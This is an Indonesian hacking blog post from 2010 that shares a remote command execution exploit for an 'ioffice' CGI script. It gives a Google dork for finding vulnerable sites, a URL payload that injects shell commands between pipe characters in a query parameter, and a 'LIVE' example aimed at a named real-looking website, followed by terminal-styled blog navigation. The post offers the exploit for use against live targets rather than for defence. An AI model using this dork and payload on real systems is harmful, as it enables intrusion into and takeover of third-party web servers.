Datang Lagi mae yg ganteng, bawa oleh-oleh dari sebelah nan jauh.
langsung saja.
Vulnerable ini bersifat fatal karena user bisa memerintahkan website untuk meng-eksekusi command langsung ke dalam web (RCE).
Dork :
Code:
inurl:index.pl?section_name=
Contoh :
Code:
www.example.com/cgi-bin/index.pl?section_name=whatever§ion=ioffice¶metre=|COMMANDs|
command atau perintah di eksekusi setelah tanda pipa |command| dan di tutup dgn pipa.
LIVE :
Code:
http://www.aciter.com/cgi-bin/aciter/index.pl?section_name=_§ion=openfile¶metre=|ls|
referensi :
Code:
http://packetstormsecurity.org/1007-exploits/ioffice-exec.txt
thanks to packetstormsecurity.org and ALL member HN-Communty
special to mr.hack dan jurrank_dankkal
Labels: exploit, hacking
[@xterminal-island ~]$ : profile
[@xterminal-island ~]$ : blogs
[@xterminal-island ~]$ : links
[@xterminal-island ~]$ : help
Available commands:
posts
show
prev
archive
profile
links
google
motd
login
home
man
help
[@xterminal-island ~]$ : man
posts : for view my post
show : for view content
prev : for view previous post
archive : for view archive post
profile : view my profile
links : my links and my community
google : My Uncle
motd : Motivation of The Day
login : Login to blogger
home : back to Home
help
[@xterminal-island ~]$ : motd
Message of the day:
Kegagalan dapat dibagi menjadi dua sebab,
yaitu orang yang berfikir tapi tidak pernah bertindak,
dan orang yang bertindak tapi tidak pernah berfikir ..
Pemenang tidak melakukan sesuatu yang "BERBEDA"
Tetapi pemenang melakukan sesuatu dengan "CARA YANG BERBEDA"
(Aris Ahmad Jaya)
Bad command or filename.
0
comments
|
02 August 2010
0 Comments:
Post a Comment
<< Home